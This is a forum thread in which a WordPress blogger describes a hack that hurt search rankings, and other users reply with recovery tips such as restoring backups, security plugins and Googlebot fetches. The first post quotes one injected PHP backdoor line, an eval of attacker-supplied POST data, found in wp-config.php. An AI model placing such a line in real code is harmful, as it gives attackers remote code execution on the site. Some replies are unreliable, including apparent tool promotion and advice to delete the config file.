My blog was hacked!

I am feeling very bad by saying that my blog was hacked by someone who cant see my rankings in search.

But after few research on google i found one solution.

I am running wordpress blog , someone was injected code to my wp-config.php file (I dont know how) and it always shows at top of my header of wordpress blog in hidden.

When I checked my robots.txt file in webmaster tools then it shows some bad anchor links added. I found this code was injected to my wp-config.php "eval($_POST['attacker_key']);"

This injection was for approx 2 days and i dont know about that, when i tried to check my feeds then it shows no working. So i start to search on it and found that my blog was hacked.

My rankings are down current due to this hack. I was getting 2000 to 3000 pageviews per day but now am getting 300 to 400 only.

I have resolved hack by deleting injected code but i am facing lower rankings as my website was at top page for my main keyword.

Is there anything else is required to get my rankings back? or google will take time to get my rankings same as it was previously in search?

      I had this some time ago and the first thing my host did was restored my sites from a backup they had as well as cleaning everything else which was with the same host in that hosting acocunt.

      Do a plugin search for bulletproof secrutiy or secure plugins and you can also delete the config file so it can't be accessed.

        I'd try doing a google search, and clicking into your website from there.

        Make sure your site is not redirecting to something completely different.

        I had this issue with a nasty thing that got in and it kept rewriting my efforts, and redirecting all my sites to nasty places.

        I couldn't see it if I went directly to my site - only from SE results and clicking in.

    Do a *full* restore from before the hack, even if it means some posts|data is missing from the latest version, get hold of Social Hub Builder, join all the sites, re index all the blog links, via this soft, then ping all the urls (old & new) to a few rss sites, it will soon be back!

    Also, get your WP install protected so no injection can occur

    I have faced similar problem someime back , I just asked to my host and they restore it with previous backup and I only lost one post during this process.

      What about search rankings?? Was your rankings were down?

      I have removed injected code all is fine now except rankings in search
      my blog were on 1st page 2nd place but now its on 2nd page 3rd place due to this injection....

    You could also try adding Google Webmaster Tools to the site and 'fetch as googlebot' to make sure there is no code injected that you can't actually see but that googlebot can see.

    Once you have cleaned it completely it can take 3-5 days for your rankings to return but they should return if the only problem was the hacking.

      but if i clicked on fetch as googlebot then it shows me warning if injected code is still there or what?

    Ranking problem would resolve soon if all the content are still available. So don't worry about that. But you need to be very careful from now. Now they hacked your blog. After that they can create nasty backlinks. So you need to check on regular basis.

    Call your host and tell them to restore everthing from before it got hacked. I had to do this a couple of times.

    Google Webmaster Tools will show if site is infected or not among many other things
    I'm not sure if this will do any help but you may want to contact Google through their Google Webmasters Tool (website) and explain the situation with some proofs. Well, you'll never know what you're losing or gaining unless you try.
